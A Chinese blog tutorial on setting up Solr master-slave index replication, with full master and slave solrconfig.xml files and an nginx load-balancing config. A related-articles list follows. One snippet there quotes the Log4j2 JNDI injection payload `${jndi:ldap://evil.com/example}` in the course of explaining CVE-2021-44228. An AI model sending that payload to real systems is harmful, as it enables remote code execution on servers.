fengshulin

solr主从部署

1、3台solr服务器，采用主从复制的策略实现索引文件的同步，主从就是设置集群中一台server为主，另外为从服务器，从服务器定时从主服务器中同步数据

主服务器的solr配置（solrconfig.xml）

 
         <? 
         xml 
         version 
         = 
         "1.0" 
         encoding 
         = 
         "UTF-8" 
         ?> 
        
         <!-- 
        
         Licensed to the Apache Software Foundation (ASF) under one or more 
        
         contributor license agreements.  See the NOTICE file distributed with 
        
         this work for additional information regarding copyright ownership. 
        
         The ASF licenses this file to You under the Apache License, Version 2.0 
        
         (the "License"); you may not use this file except in compliance with 
        
         the License.  You may obtain a copy of the License at 
        
         http://www.apache.org/licenses/LICENSE-2.0 
        
         Unless required by applicable law or agreed to in writing, software 
        
         distributed under the License is distributed on an "AS IS" BASIS, 
        
         WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
        
         See the License for the specific language governing permissions and 
        
         limitations under the License. 
        
         --> 
        
         <!-- 
        
         This is a stripped down config file used for a simple example...  
        
         It is *not* a good example to work from. 
        
         --> 
        
         < 
         config 
         > 
        
         < 
         luceneMatchVersion 
         >4.9</ 
         luceneMatchVersion 
         > 
        
         <!-- A 'dir' option by itself adds any files found in the directory 
        
         to the classpath, this is useful for including all jars in a 
        
         directory. 
        
         When a 'regex' is specified in addition to a 'dir', only the 
        
         files in that directory which completely match the regex 
        
         (anchored on both ends) will be included. 
        
         If a 'dir' option (with or without a regex) is used and nothing 
        
         is found that matches, a warning will be logged. 
        
         The examples below can be used to load some solr-contribs along 
        
         with their external dependencies. 
        
         --> 
        
         <!--  The DirectoryFactory to use for indexes. 
        
         solr.StandardDirectoryFactory, the default, is filesystem based. 
        
         solr.RAMDirectoryFactory is memory based, not persistent, and doesn't work with replication. --> 
        
         < 
         directoryFactory 
         name 
         = 
         "DirectoryFactory" 
         class 
         = 
         "${solr.directoryFactory:solr.StandardDirectoryFactory}" 
         /> 
        
         < 
         dataDir 
         >${solr.core0.data.dir:}</ 
         dataDir 
         > 
        
         <!-- To enable dynamic schema REST APIs, use the following for <schemaFactory>: 
        
         <schemaFactory class="ManagedIndexSchemaFactory"> 
        
         <bool name="mutable">true</bool> 
        
         <str name="managedSchemaResourceName">managed-schema</str> 
        
         </schemaFactory> 
        
         When ManagedIndexSchemaFactory is specified, Solr will load the schema from 
        
         he resource named in 'managedSchemaResourceName', rather than from schema.xml. 
        
         Note that the managed schema resource CANNOT be named schema.xml.  If the managed 
        
         schema does not exist, Solr will create it after reading schema.xml, then rename 
        
         'schema.xml' to 'schema.xml.bak'. 
        
         Do NOT hand edit the managed schema - external modifications will be ignored and 
        
         overwritten as a result of schema modification REST API calls. 
        
         When ManagedIndexSchemaFactory is specified with mutable = true, schema 
        
         modification REST API calls will be allowed; otherwise, error responses will be 
        
         sent back for these requests. 
        
         --> 
        
         < 
         schemaFactory 
         class 
         = 
         "ClassicIndexSchemaFactory" 
         /> 
        
         < 
         updateHandler 
         class 
         = 
         "solr.DirectUpdateHandler2" 
         > 
        
         < 
         updateLog 
         > 
        
         < 
         str 
         name 
         = 
         "dir" 
         >${solr.core0.data.dir:}</ 
         str 
         > 
        
         </ 
         updateLog 
         > 
        
         </ 
         updateHandler 
         > 
        
         <!-- realtime get handler, guaranteed to return the latest stored fields 
        
         of any document, without the need to commit or open a new searcher. The current 
        
         implementation relies on the updateLog feature being enabled. --> 
        
         < 
         requestHandler 
         name 
         = 
         "/get" 
         class 
         = 
         "solr.RealTimeGetHandler" 
         > 
        
         < 
         lst 
         name 
         = 
         "defaults" 
         > 
        
         < 
         str 
         name 
         = 
         "omitHeader" 
         >true</ 
         str 
         > 
        
         </ 
         lst 
         > 
        
         </ 
         requestHandler 
         >  
        
         < 
         requestHandler 
         name 
         = 
         "/replication" 
         class 
         = 
         "solr.ReplicationHandler" 
         > 
        
         < 
         lst 
         name 
         = 
         "master" 
         > 
        
         <!--Replicate on 'startup' and 'commit'. 'optimize' is also a valid value for replicateAfter. --> 
        
         < 
         str 
         name 
         = 
         "replicateAfter" 
         >startup</ 
         str 
         > 
        
         < 
         str 
         name 
         = 
         "replicateAfter" 
         >commit</ 
         str 
         > 
        
         < 
         str 
         name 
         = 
         "replicateAfter" 
         >optimize</ 
         str 
         > 
        
         <!--Create a backup after 'optimize'. Other values can be 'commit', 'startup'. It is possible to have multiple entries of this config string.  Note that this is just for backup, replication does not require this. --> 
        
         <!-- <str name="backupAfter">optimize</str> --> 
        
         <!--If configuration files need to be replicated give the names here, separated by comma --> 
        
         < 
         str 
         name 
         = 
         "confFiles" 
         >schema.xml,stopwords.txt</ 
         str 
         > 
        
         <!--The default value of reservation is 10 secs.See the documentation below . Normally , you should not need to specify this --> 
        
         < 
         str 
         name 
         = 
         "commitReserveDuration" 
         >00:00:10</ 
         str 
         > 
        
         </ 
         lst 
         > 
        
         </ 
         requestHandler 
         > 
        
         < 
         requestDispatcher 
         handleSelect 
         = 
         "true" 
         > 
        
         < 
         requestParsers 
         enableRemoteStreaming 
         = 
         "false" 
         multipartUploadLimitInKB 
         = 
         "2048" 
         formdataUploadLimitInKB 
         = 
         "2048" 
         /> 
        
         </ 
         requestDispatcher 
         > 
        
         < 
         requestHandler 
         name 
         = 
         "standard" 
         class 
         = 
         "solr.StandardRequestHandler" 
         default 
         = 
         "true" 
         /> 
        
         < 
         requestHandler 
         name 
         = 
         "/analysis/field" 
         startup 
         = 
         "lazy" 
         class 
         = 
         "solr.FieldAnalysisRequestHandler" 
         /> 
        
         < 
         requestHandler 
         name 
         = 
         "/update" 
         class 
         = 
         "solr.UpdateRequestHandler"  
         /> 
        
         < 
         requestHandler 
         name 
         = 
         "/admin/" 
         class 
         = 
         "org.apache.solr.handler.admin.AdminHandlers" 
         /> 
        
         <!-- 
        
         <requestHandler name="/admin/ping" class="solr.PingRequestHandler"> 
        
         <lst name="invariants"> 
        
         <str name="q">solrpingquery</str> 
        
         </lst> 
        
         <lst name="defaults"> 
        
         <str name="echoParams">all</str> 
        
         </lst> 
        
         </requestHandler> 
        
         --> 
        
         < 
         queryResultWindowSize 
         >1500</ 
         queryResultWindowSize 
         > 
        
         < 
         queryResultMaxDocsCached 
         >150</ 
         queryResultMaxDocsCached 
         >  
        
         < 
         queryResultCache 
        
         class 
         = 
         "solr.LRUCache" 
        
         size 
         = 
         "15000" 
        
         initialSize 
         = 
         "15000" 
        
         autowarmCount 
         = 
         "1500" 
         /> 
        
         <!-- config for the admin interface --> 
        
         < 
         admin 
         > 
        
         < 
         defaultQuery 
         >solr</ 
         defaultQuery 
         > 
        
         </ 
         admin 
         > 
        
         </ 
         config 
         >

从服务器配置（ solrconfig.xml）

 
         <? 
         xml 
         version 
         = 
         "1.0" 
         encoding 
         = 
         "UTF-8" 
         ?> 
        
         <!-- 
        
         Licensed to the Apache Software Foundation (ASF) under one or more 
        
         contributor license agreements.  See the NOTICE file distributed with 
        
         this work for additional information regarding copyright ownership. 
        
         The ASF licenses this file to You under the Apache License, Version 2.0 
        
         (the "License"); you may not use this file except in compliance with 
        
         the License.  You may obtain a copy of the License at 
        
         http://www.apache.org/licenses/LICENSE-2.0 
        
         Unless required by applicable law or agreed to in writing, software 
        
         distributed under the License is distributed on an "AS IS" BASIS, 
        
         WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
        
         See the License for the specific language governing permissions and 
        
         limitations under the License. 
        
         --> 
        
         <!-- 
        
         This is a stripped down config file used for a simple example...  
        
         It is *not* a good example to work from. 
        
         --> 
        
         < 
         config 
         > 
        
         < 
         luceneMatchVersion 
         >4.9</ 
         luceneMatchVersion 
         > 
        
         <!-- A 'dir' option by itself adds any files found in the directory 
        
         to the classpath, this is useful for including all jars in a 
        
         directory. 
        
         When a 'regex' is specified in addition to a 'dir', only the 
        
         files in that directory which completely match the regex 
        
         (anchored on both ends) will be included. 
        
         If a 'dir' option (with or without a regex) is used and nothing 
        
         is found that matches, a warning will be logged. 
        
         The examples below can be used to load some solr-contribs along 
        
         with their external dependencies. 
        
         --> 
        
         <!--  The DirectoryFactory to use for indexes. 
        
         solr.StandardDirectoryFactory, the default, is filesystem based. 
        
         solr.RAMDirectoryFactory is memory based, not persistent, and doesn't work with replication. --> 
        
         < 
         directoryFactory 
         name 
         = 
         "DirectoryFactory" 
         class 
         = 
         "${solr.directoryFactory:solr.StandardDirectoryFactory}" 
         /> 
        
         < 
         dataDir 
         >${solr.core0.data.dir:}</ 
         dataDir 
         > 
        
         <!-- To enable dynamic schema REST APIs, use the following for <schemaFactory>: 
        
         <schemaFactory class="ManagedIndexSchemaFactory"> 
        
         <bool name="mutable">true</bool> 
        
         <str name="managedSchemaResourceName">managed-schema</str> 
        
         </schemaFactory> 
        
         When ManagedIndexSchemaFactory is specified, Solr will load the schema from 
        
         he resource named in 'managedSchemaResourceName', rather than from schema.xml. 
        
         Note that the managed schema resource CANNOT be named schema.xml.  If the managed 
        
         schema does not exist, Solr will create it after reading schema.xml, then rename 
        
         'schema.xml' to 'schema.xml.bak'. 
        
         Do NOT hand edit the managed schema - external modifications will be ignored and 
        
         overwritten as a result of schema modification REST API calls. 
        
         When ManagedIndexSchemaFactory is specified with mutable = true, schema 
        
         modification REST API calls will be allowed; otherwise, error responses will be 
        
         sent back for these requests. 
        
         --> 
        
         < 
         schemaFactory 
         class 
         = 
         "ClassicIndexSchemaFactory" 
         /> 
        
         < 
         updateHandler 
         class 
         = 
         "solr.DirectUpdateHandler2" 
         > 
        
         < 
         updateLog 
         > 
        
         < 
         str 
         name 
         = 
         "dir" 
         >${solr.core0.data.dir:}</ 
         str 
         > 
        
         </ 
         updateLog 
         > 
        
         </ 
         updateHandler 
         > 
        
         <!-- realtime get handler, guaranteed to return the latest stored fields 
        
         of any document, without the need to commit or open a new searcher. The current 
        
         implementation relies on the updateLog feature being enabled. --> 
        
         < 
         requestHandler 
         name 
         = 
         "/get" 
         class 
         = 
         "solr.RealTimeGetHandler" 
         > 
        
         < 
         lst 
         name 
         = 
         "defaults" 
         > 
        
         < 
         str 
         name 
         = 
         "omitHeader" 
         >true</ 
         str 
         > 
        
         </ 
         lst 
         > 
        
         </ 
         requestHandler 
         >  
        
         < 
         requestHandler 
         name 
         = 
         "/replication" 
         class 
         = 
         "solr.ReplicationHandler" 
         startup 
         = 
         "lazy" 
         > 
        
         < 
         lst 
         name 
         = 
         "slave" 
         > 
        
         <!--fully qualified url for the replication handler of master . It is possible to pass on this as a request param for the fetchindex command--> 
        
         < 
         str 
         name 
         = 
         "masterUrl" 
         >http://10.10.53.235:8080/solr/core0/replication</ 
         str 
         > 
        
         <!--Interval in which the slave should poll master .Format is HH:mm:ss . If this is absent slave does not poll automatically. 
        
         But a fetchindex can be triggered from the admin or the http API --> 
        
         < 
         str 
         name 
         = 
         "pollInterval" 
         >00:10:00</ 
         str 
         > 
        
         <!-- THE FOLLOWING PARAMETERS ARE USUALLY NOT REQUIRED--> 
        
         <!--to use compression while transferring the index files. The possible values are internal|external 
        
         if the value is 'external' make sure that your master Solr has the settings to honour the accept-encoding header. 
        
         see here for details http://wiki.apache.org/solr/SolrHttpCompression 
        
         If it is 'internal' everything will be taken care of automatically. 
        
         USE THIS ONLY IF YOUR BANDWIDTH IS LOW . THIS CAN ACTUALLY SLOWDOWN REPLICATION IN A LAN--> 
        
         < 
         str 
         name 
         = 
         "compression" 
         >internal</ 
         str 
         > 
        
         <!--The following values are used when the slave connects to the master to download the index files. 
        
         Default values implicitly set as 5000ms and 10000ms respectively. The user DOES NOT need to specify 
        
         these unless the bandwidth is extremely low or if there is an extremely high latency--> 
        
         < 
         str 
         name 
         = 
         "httpConnTimeout" 
         >5000</ 
         str 
         > 
        
         < 
         str 
         name 
         = 
         "httpReadTimeout" 
         >10000</ 
         str 
         > 
        
         <!-- If HTTP Basic authentication is enabled on the master, then the slave can be configured with the following --> 
        
         </ 
         lst 
         > 
        
         </ 
         requestHandler 
         > 
        
         < 
         requestDispatcher 
         handleSelect 
         = 
         "true" 
         > 
        
         < 
         requestParsers 
         enableRemoteStreaming 
         = 
         "false" 
         multipartUploadLimitInKB 
         = 
         "2048" 
         formdataUploadLimitInKB 
         = 
         "2048" 
         /> 
        
         </ 
         requestDispatcher 
         > 
        
         < 
         requestHandler 
         name 
         = 
         "standard" 
         class 
         = 
         "solr.StandardRequestHandler" 
         default 
         = 
         "true" 
         /> 
        
         < 
         requestHandler 
         name 
         = 
         "/analysis/field" 
         startup 
         = 
         "lazy" 
         class 
         = 
         "solr.FieldAnalysisRequestHandler" 
         /> 
        
         < 
         requestHandler 
         name 
         = 
         "/update" 
         class 
         = 
         "solr.UpdateRequestHandler"  
         /> 
        
         < 
         requestHandler 
         name 
         = 
         "/admin/" 
         class 
         = 
         "org.apache.solr.handler.admin.AdminHandlers" 
         /> 
        
         < 
         requestHandler 
         name 
         = 
         "/admin/ping" 
         class 
         = 
         "solr.PingRequestHandler" 
         > 
        
         < 
         lst 
         name 
         = 
         "invariants" 
         > 
        
         < 
         str 
         name 
         = 
         "q" 
         >solrpingquery</ 
         str 
         > 
        
         </ 
         lst 
         > 
        
         < 
         lst 
         name 
         = 
         "defaults" 
         > 
        
         < 
         str 
         name 
         = 
         "echoParams" 
         >all</ 
         str 
         > 
        
         </ 
         lst 
         > 
        
         </ 
         requestHandler 
         > 
        
         < 
         queryResultWindowSize 
         >1500</ 
         queryResultWindowSize 
         > 
        
         < 
         queryResultMaxDocsCached 
         >150</ 
         queryResultMaxDocsCached 
         > 
        
         < 
         queryResultCache 
        
         class 
         = 
         "solr.LRUCache" 
        
         size 
         = 
         "15000" 
        
         initialSize 
         = 
         "15000" 
        
         autowarmCount 
         = 
         "1500" 
         /> 
        
         <!-- config for the admin interface --> 
        
         < 
         admin 
         > 
        
         < 
         defaultQuery 
         >solr</ 
         defaultQuery 
         > 
        
         </ 
         admin 
         > 
        
         </ 
         config 
         >

2、solrj实现索引创建和查询

由于采用了主从架构，所以创建直接在主服务器上完成就可以，从服务器会自动同步

查询时前端用nginx做代理，达到负载均衡的效果

nginx的配置如下：

 
         upstream localhost{ 
        
         server 10.10.53.177:8080; 
        
         server 10.16.15.121:8080; 
        
         server 10.10.53.235:8080; 
        
         } 
        
         server 
        
         { 
        
         listen       80; 
        
         server_name  10.10.53.235; 
        
         root        /home/html; 
        
         charset     utf-8; 
        
         include     proxy.conf; 
        
         #   location ~ ^/getAllPlaybill.json$ 
        
         #   { 
        
         #   if ($query_string ~* "playbillDate=(.*)&mdv=(.*)$") { 
        
         #       set $playbillDate $1; 
        
         #         rewrite  ^/getAllPlaybill\.json  http://10.10.53.235/getAllPlaybill_$playbillDate.txt break;  
        
         #  } 
        
         # } 
        
         location ~ / 
        
         { 
        
         proxy_pass   http://localhost; 
        
         } 
        
         # Add expires header for static comtent 
        
         location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$ 
        
         { 
        
         access_log   off; 
        
         expires      10d; 
        
         } 
        
         location ~ .*\.(js|css)$ 
        
         { 
        
         access_log   off; 
        
         expires      1h; 
        
         } 
        
         }

一般情况下，可以设置主写从查，这时候在检索的时候就不去主服务器上，配置如下：

1

2

3

4

5

 
         upstream localhost{ 
        
         server 10.10.53.177:8080; 
        
         server 10.16.15.121:8080; 
        
         //server 10.10.53.235:8080; 注释即可 
        
         }

你可能感兴趣的:(Solr)

分布式搜索引擎Elasticsearch——基础敲代码的旺财架构进阶 elasticsearch java 搜索引擎 ES-head
文章目录一、Lucene与Solr与Elasticsearch二、ES核心术语三、ES核心概念四、倒排索引五、ES的安装（centos7）1、下载地址（这里安装linux版本）2、解压压缩包3、修改配置文件(1)修改核心配置文件(2)修改JVM配置文件4、启动ES(1)添加系统用户并授权(2)ES启动(3)修改配置文件(4)再次启动ES六、安装ES-head插件（可视化管理插件）1、使用谷歌市场安
Java高级技术day75：Zookeeper与Dubbo 开源oo柒
一、Zookeeper的介绍1.Zookeeper介绍：顾名思义zookeeper就是动物园管理员，他是用来管hadoop（大象）、Hive(蜜蜂)、pig(小猪)的管理员，ApacheHbase和ApacheSolr的分布式集群都用到了zookeeper；Zookeeper:是一个分布式的、开源的程序协调服务，是hadoop项目下的一个子项目。他提供的主要功能包括：配置管理、名字服务、分布式锁、
Elasticsearch详解es 思静语 elasticsearch elasticsearch 大数据搜索引擎
文章目录概述es架构为什么要使用ElasticSearchElasticSearch的优势使用场景es为什么这么快倒排索引如何保证ES和数据库的数据一致性监听binlog同步双写elasticsearch是如何实现master选举的Elasticsearch与Solr的区别概述ES全称是ElasticSearch，它是一个建立在全文搜索引擎库Lucene基础上的开源搜索和分析引擎。ES它本身具有分
08、全文检索 -- Solr -- 使用 SolrClient 连接 Solr（演示手动配置自定义的SolrClient 并在测试类使用 solrClient 进行添加、查询、删除文档的操作） _L_J_H_ #全文检索（Solr 和 Elasticsearch）全文检索 solr lucene
目录SolrClientSolrClient的功能SolrClient这个API包含如下常用方法：SolrClient方法的说明：SpringBootStarterDataSolr的不足手动配置自定义的SolrClientSolrClient代码演示配置自定义的SolrClient1、创建一个SpringBoot项目，添加依赖2、SolrAutoConfiguration解析3、手动配置自定义的S
java 商城全文搜索_利用solr实现商品的搜索功能闲侃数码 java 商城全文搜索
后期补充：为什么要用solr服务，为什么要用luncence？问题提出：当我们访问购物网站的时候，我们可以根据我们随意所想的内容输入关键字就可以查询出相关的内容，这是怎么做到呢？这些随意的数据不可能是根据数据库的字段查询的，那是怎么查询出来的呢，为什么千奇百怪的关键字都可以查询出来呢？答案就是全文检索工具的实现，luncence采用了词元匹配和切分词。举个例子：北京天安门------luncenc
solr7集群 springboot_springboot 集成solr 骑lv上高速 solr7集群 springboot
一、版本介绍：jdk1.8tomcat8springboot2.1.3RELEASE(这里有坑,详见下文)solr7.4.0(没有选择最新的版本,是因为项目的boot版本是2.1.3,其对应的solr-solrj.jar版本是7.4.0，为避免出现不可预料不可抗拒不可解决的问题，谨慎选用与之一样版本)二、solr服务器搭建下载1.tomcat8的下载不赘述；2.solr下载：进入solr官网，找历
09、全文检索 -- Solr -- SpringBoot 整合 Spring Data Solr （生成DAO组件和实现自定义查询方法） _L_J_H_ #全文检索（Solr 和 Elasticsearch）spring 全文检索 solr
目录SpringBoot整合SpringDataSolrSpringDataSolr的功能（生成DAO组件）：SpringDataSolr大致包括如下几方面功能：@Query查询（属于半自动）代码演示：1、演示通过dao组件来保存文档1、实体类指定索引库2、修改日志级别3、创建Dao接口4、先删除所有文档5、创建测试类6、演示结果2、根据title_cn字段是否包含关键字来查询3、查询指定价格范围
vulhub中Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）余生有个小酒馆 vulhub漏洞复现 apache log4j 安全
ApacheLog4j2是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入，执行任意代码。1.服务启动后，访问`http://your-ip:8983`即可查看到ApacheSolr的后台页面。2.`$
solr —— 1 全文检索Solr8.0第一部分苏打饼干没加心 solr
solr，毕设啊，快被写完吧1solr介绍什么是solrLucene与Solr与ES为什么要用slor2HelloWorld2.1项目安装部署2.2项目安装配置创建核心创建document(表)添加文件查询数据3solr后台管理页面详解控制面板5全文检索千万级别数据实战，全面剖析架构设计，大数据瓶颈突破6数据库导入索引BV1Dt411G7eF1solr介绍什么是solrsolr简化了程序员的操作L
（三十七）大数据实战——Solr服务的部署安装厉害哥哥吖大数据大数据 solr
前言Solr是一个基于ApacheLucene的开源搜索平台，它提供了强大的全文搜索、分布式搜索和数据分析功能。Solr可以用于构建高性能的搜索应用程序，支持从海量数据中快速检索和分析信息。Solr使用倒排索引和先进的搜索算法，可实现快速而准确的全文搜索。Solr可以在多个服务器上进行水平扩展，实现分布式搜索和负载均衡。Solr支持复杂的过滤、排序和范围查询，使您可以根据各种条件对搜索结果进行精确
ElasticSearch VS. Solr VS. Sphinx：最好的开源搜索引擎比较 chenxiyy3773 大数据人工智能数据库
译者按：本文是来自一家乌克兰技术公司的文章。该文章译者认为着重在应用上，而非单纯的性能对比。给自己的平台选择一个合适的搜索引擎比任何一个吹嘘技术强大的好。虽然最近一两年ES发展飞速，但sphinx的简单易用性还是赢得很多机构公司的青睐，比如优酷土豆都是用sphinx。所以使用之前，务必先了解自己的业务诉求，再选择合适的搜索引擎，而非一昧跟风。翻译若有误请指正，谢谢查看！编译自：ELASTICSEA
阿里P8架构师谈：开源搜索引擎Lucene、Solr、Sphinx等优劣势比较 liuhuiteng 中间件中间件
开源搜索引擎分类1.Lucene系搜索引擎，java开发,包括：LuceneSolrElasticsearchKatta、Compass等都是基于Lucene封装。你可以想象Lucene系有多强大。2.Sphinx搜素引擎，c++开发,简单高性能。以下重点介绍最常用的开源搜素引擎：Lucene、Solr、Elasticsearch、Sphinx的特点和优劣势选型比较。Lucene1.Lucene简
使用solr6.0搭建solrCloud 牛初九
使用solr6.0搭建solrCloud一、搭建zookeeper集群下载zookeeper压缩包到自己的目录并解压（本例中的目录在/opt下），zookeeper的根目录我们在这里用${ZK_HOME}表示。在${ZK_HOME}/conf下创建zoo.cfg文件，可以复制zoo_sample.cfg文件：cpzoo_sample.cfgzoo.cfg修改zoo.cfg的内容如下：vimzoo.
Error CREATEing SolrCore 'index': Unable to create core: index Caused by: No enum constant org.apach 杉斯狼后台 Java solr enum 索引 lucene
ErrorCREATEingSolrCore'index':Unabletocreatecore:indexCausedby:Noenumconstantorg.apache.lucene.util.Version.LUCENE_48出错原因：solr版本配置不正确解决方法：在索引文件的目录下conf>solrconfig.xml4.8将4.8修改为4.7（你具体的版本，可以参照collectio
solr 或查询 or query 杉斯狼 solr solr java web java lucene
MenuId:(472e44eaac735772ef44366OR80f24930dcf7131262d9OR51e8f9844f8bd1283ac)如上句，格式为key:(value1ORvalue2ORvalue3OR...)注意，OR必须为大写，同时两边各有一空格。
尚学堂102天总结+springdata-redis 人间草木为伴
102天行百里者半九十，想要在一个行业里成为顶尖人才，一定满足一万小时定律，要想学好JAVA，需要持之以恒不断地努力,每天都要勤思考+善于询问+解决问题!知识温故而知新>>>>>>Linux下安装solr的教程555.pngSpringBoot2.2以上版本添加junit进行测试的方法h111.pngMaven依赖中标签的作用image.png./的作用和用法image.png启动和关闭redis
开源大数据集群部署（九）Ranger审计日志集成（solr）大数据部署
作者：櫰木1、下载solr安装包并解压包tar-xzvfsolr-8.11.2.gzcdsolr-8.11.2执行安装脚本./bin/install_solr_service.sh/opt/solr-8.11.2.tgz安装后，会在/etc/default/下生成solr.in.sh文件。2、在rangeradmin下生成solr相关配置cd/opt/ranger-2.3.0-admin/cont
Lucene/Solr/Elasticsearch可视化工具luke的下载及使用景小悦 lucene luke elasticsearch solr
※※使用的luke版本一定与lucene一致，否则会出现问题。luke下载地址：https://github.com/DmitryKey/luke/releasesluke是一个用于Lucene/Solr/Elasticsearch搜索引擎，方便开发和诊断的GUI（可视化）工具。luke:Luke是查询LUCENE索引文件的工具，而且用Luke的Search可以做查询Lukeisahandydev
CVE-2017-12149漏洞复现黑客大佬漏洞复现 web安全安全网络 python
服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish漏洞复现中间件及框架列表：IIS，Apache，Nginx，Tomcat，Docker，Weblogic，JBoos，WebSphere，Jenkins，GlassFish，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery等1、中间件-Web
【知识整理】技术新人的培养计划卢卡上学文心一言 AIGC 人工智能 php 技术团队新人培养 git
一、培养计划落地实操1.概要新人入职，要给予适当的指导，目标：1、熟悉当前环境：生活环境：吃饭、交通、住宿、娱乐工作环境：使用的工具，Mac、maven、git、idea等2、熟悉并掌握工作技能：技术栈：Spring、Hibernate、Cache、Solr、MySQL（根据公司内部技术使用调整）内部协作工具：wiki（Confluence）、task（JIRA）、git（Stash）快捷操作：M
Apache Log4j2漏洞复现（反弹shell）安全菜 apache
0x01漏洞描述ApacheLog4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，ApacheStruts2、ApacheSolr、ApacheDruid、Apa
2021最新版 ElasticSearch 7.6.1 教程详解爬虫jsoup+es模拟京东搜索（狂神说） Super_Song_ 中间件 elasticsearch 搜索引擎 java nosql
文章目录一、ElasticSearch简介1.了解创始人DougCutting2.Lucene简介3.ElasticSearch简介4.ElasticSearch和Solr的区别5.了解ELK二、软件安装1.ElasticSearch2.ElasticSearchHead3.Kibana三、ElasticSearch使用详解1.ES核心概念文档索引倒排索引ik分词器2.命令模式的使用Rest风格说
大数据用户画像系统架构设计充电了么
文章目录一、用户画像数据仓库搭建、数据抽取部分二、大数据平台、用户画像集市分层设计、处理三、离线计算部分四、实时计算部分五、Solr/ES搜索引擎部分六、JavaWeb毫秒级实时用户画像接口服务七、用户画像实时展示异步触发获取Web自助后台总结用户画像是一个非常通用普遍使用的系统，从我们的架构图中可以看出，从数据计算时效性上来讲分离线计算和实时计算。离线计算一般是每天晚上全量计算所有用户，或者按需
Apache Log4j2 漏洞原理仲瑿漏洞原理 apache log4j java
ApacheLog4j远程代码执行漏洞1.漏洞危害ApacheLog4j被发现存在一处任意代码执行漏洞，由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。经验证，ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等众多组件与大型应用均受影响2.影响版本ApacheLog4j2.x<=2.14.13.漏
rm: relocation error: /lib64/libc.so.6: symbol _dl_starting_up, version GLIBC_PRIVATE not defined in feifeidata
由于安装glibc-2.23.tar.gz导致系统出错，命令不能用恢复方法：进入/usr/lib64目录，使用ls-ltr命令ls-ltrlrwxrwxrwx.1rootroot2112月1421:46ld-linux-x86-64.so.2->/usr/lib64/ld-2.17.solrwxrwxrwx.1rootroot2312月1421:51libc.so.6->/usr/lib64/li
安全漏洞(1)-Log4j2远程代码执行漏洞，log4j2漏洞验证迷途的小兵安全体系_加解密算法安全 log4j2 安全漏洞
漏洞描述ApacheLog4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等均受影响。漏洞评级CVE-2021
揭秘Elasticsearch：一文读懂分布式搜索与分析引擎的核心概念超越不平凡 elasticsearch 分布式大数据
Elasticsearch是一个开源、分布式、实时搜索和分析引擎，专门用于处理大规模数据的快速检索与分析。它建立在ApacheLucene的基础上，但提供了比Lucene更为丰富的功能和友好的RESTfulAPI接口，使得开发者能够轻松地进行全文搜索、结构化搜索以及对海量数据进行复杂的聚合操作。Elasticsearch目前被广泛用于互联网多种领域中。一是搜索领域，相对于solr，成为很多搜索的不
07、全文检索 -- Solr -- Solr 全文检索之为索引库添加中文分词器 _L_J_H_ #全文检索（Solr 和 Elasticsearch）全文检索 solr 中文分词
目录Solr全文检索之为索引库添加中文分词器添加中文分词器1、添加中文分词器的jar包2、修改managed-schema配置文件什么是fieldType3、添加停用词文档4、重启solr5、添加【*_cn】动态字段，并为该字段设置中文分词器6、演示分词器的区别演示text_cjk这个简单的分词器演示text_cn这个中文分词器Solr全文检索之为索引库添加中文分词器添加中文分词器1、添加中文分词
全文检索服务器：Solr xiayehuimou solr solr 全文检索服务器
官网https://solr.apache.org/官方文档https://solr.apache.org/guide/solr/latest/deployment-guide/solrj.html1.介绍Solr是一个高性能，采用Java开发，基于Lucene的开源全文搜索服务器不仅限于搜索，Solr也可以用于存储目的。像其他NoSQL数据库一样，它是一种非关系数据存储和处理技术。solr需要运
php solr 全文检索引擎,【搜索引擎】Solr Suggester 实现全文检索功能-分词和和自动提示... 一十马 php solr 全文检索引擎
功能需求全文检索搜索引擎都会有这样一个功能：输入一个字符便自动提示出可选的短语：要实现这种功能，可以利用solr的SuggestComponent，SuggestComponent这种方法利用Lucene的Suggester实现，并支持Lucene中可用的所有查找实现。实现1.配置managed-schema文件配置自己core文件夹conf下的managed-schema文件这个是自己的字段：新
多线程编程之卫生间周凡杨 java 并发卫生间线程厕所
如大家所知，火车上车厢的卫生间很小，每次只能容纳一个人，一个车厢只有一个卫生间，这个卫生间会被多个人同时使用，在实际使用时，当一个人进入卫生间时则会把卫生间锁上，等出来时打开门，下一个人进去把门锁上，如果有一个人在卫生间内部则别人的人发现门是锁的则只能在外面等待。问题分析：首先问题中有两个实体，一个是人，一个是厕所，所以设计程序时就可以设计两个类。人是多数的，厕所只有一个（暂且模拟的是一个车厢）。
How to Install GUI to Centos Minimal sunjing linux Install Desktop GUI
http://www.namhuy.net/475/how-to-install-gui-to-centos-minimal.html I have centos 6.3 minimal running as web server. I’m looking to install gui to my server to vnc to my server. You can insta
Shell 函数 daizj shell 函数
Shell 函数 linux shell 可以用户定义函数，然后在shell脚本中可以随便调用。 shell中函数的定义格式如下： [function] funname [()]{ action; [return int;] } 说明： 1、可以带function fun() 定义，也可以直接fun() 定义,不带任何参数。 2、参数返回
Linux服务器新手操作之一周凡杨 Linux 简单操作
1.whoami 当一个用户登录Linux系统之后，也许他想知道自己是发哪个用户登录的。此时可以使用whoami命令。 [ecuser@HA5-DZ05 ~]$ whoami e
浅谈Socket通信（一）朱辉辉33 socket
